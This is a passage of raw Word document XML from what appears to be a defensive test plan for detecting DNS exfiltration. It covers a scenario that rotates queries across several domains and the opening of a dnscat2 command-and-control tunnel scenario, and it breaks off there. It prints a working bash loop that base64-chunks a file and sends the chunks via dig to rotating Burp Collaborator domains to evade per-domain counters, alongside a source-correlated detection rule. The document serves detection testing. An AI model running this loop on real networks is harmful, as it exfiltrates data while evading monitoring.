              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="646D6400" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="39EA5F08" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F4C7D3C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="14222062" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="53A241EB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="12C7C01F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Base64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="6E5A540C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7C410F23" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="66EEB31D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rotates across multiple destination domains to defeat per-domain counters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A573B82" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F92BA7A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How DNS Works in This Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B08A266" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EfficientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> counts queries per destination domain (e.g., &gt;20 queries to abc123.oastify.com in 30 minutes), an attacker can distribute the queries across multiple domains. Each domain receives only a fraction of the total queries, staying under the thres</w:t>
      </w:r>
      <w:r>
        <w:t>hold. The data is still exfiltrated — just split across receiving endpoints the attacker controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754B1937" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D133DFA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Preparation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463D8858" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Before running this, generate 3 or more Burp Collaborator subdomains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A480B8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Open Burp Collaborator client, click 'Copy to clipboard' — this is COLL</w:t>
      </w:r>
      <w:r>
        <w:t>AB1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEAEA22" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Click again — this is COLLAB2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75250BA4" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Click again — this is COLLAB3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C84FF" w14:textId="0F106F47" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Optionally add </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">your </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> domain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as a 4th destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C6EC34" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="176037E6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614D1E16" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DOMAINS</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"COLLAB1" "COLLAB2" "COLLAB3" "CUSTOM_DOMAIN")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66882049" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F4B78C0"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cat exfil_test.txt | base64 | tr -d '\n' | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fold -w 40 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D640443"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while read chunk; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104661D"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DOMAIN=${</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DOMAINS[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$RANDOM % ${#DOMAINS[@]}]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CE5655"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dig +short "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{DOMAIN}" @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D2AEA8"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sleep $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shuf</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5-15 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B832A37"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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F75463" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186D3861" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detection Rule Required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B2212" w14:paraId="4666CD63" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="31188F9F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="164A8AF3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="44C14AFE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="3134AA64" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="70E22401" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2E8C40C9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Source-correlated multi-domain exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="559E33C3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Single source sending high-entropy subdomains to &gt;2 never-before-seen domains within 1h → ALERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C797D0B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBEEA1B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="E67E22"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF3CD"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>⚠</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WARNING: </w:t>
      </w:r>
      <w:r>
        <w:t>Key point: Detection must correlate by source IP, not just by destination domain. If they only count per-domain, rotation defeats them completely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16280938" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F6631E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.3 Scenario 12: dnscat2 — Interactive DNS C2 Tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F452B19"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B2212" w14:paraId="00D53F25" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="5B933692" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="39A16CBC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="18EF61AD" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0FE40F90" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3B35C5BB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Very High — APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0E72C9AB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3282F7A0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="65627D6E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>dnscat2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="00AB8B02" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="64AF5D64" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>What It Does</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="369EAEFA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Full bidirectional command-and-control tunnel over DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="03501C21" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="50008B91" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Why It Matters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3FF70A3A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Tests detection of interactive DNS tunnels, not just one-shot exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3353D549" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322A2D4F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How DNS Works in This Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17190DBD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Unlike the previous scenarios which send data in one direction (outbound exfiltration), dnscat2 creates a full bidirectional tunnel over DNS. The client encodes commands and responses into DNS queries (outbound) and reads data from DNS TXT/CNAME/MX respons</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es (inbound). This creates a persistent, interactive session — the attacker can browse files, run commands, and exfiltrate data in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>real time, all over</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> DNS. The traffic pattern is fundamentally different from one-shot exfiltration: there are sustained, peri</w:t>
      </w:r>
      <w:r>
        <w:t>odic queries with both high-entropy subdomains (outbound data) and large DNS responses (inbound data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3730BD90" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E5161A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
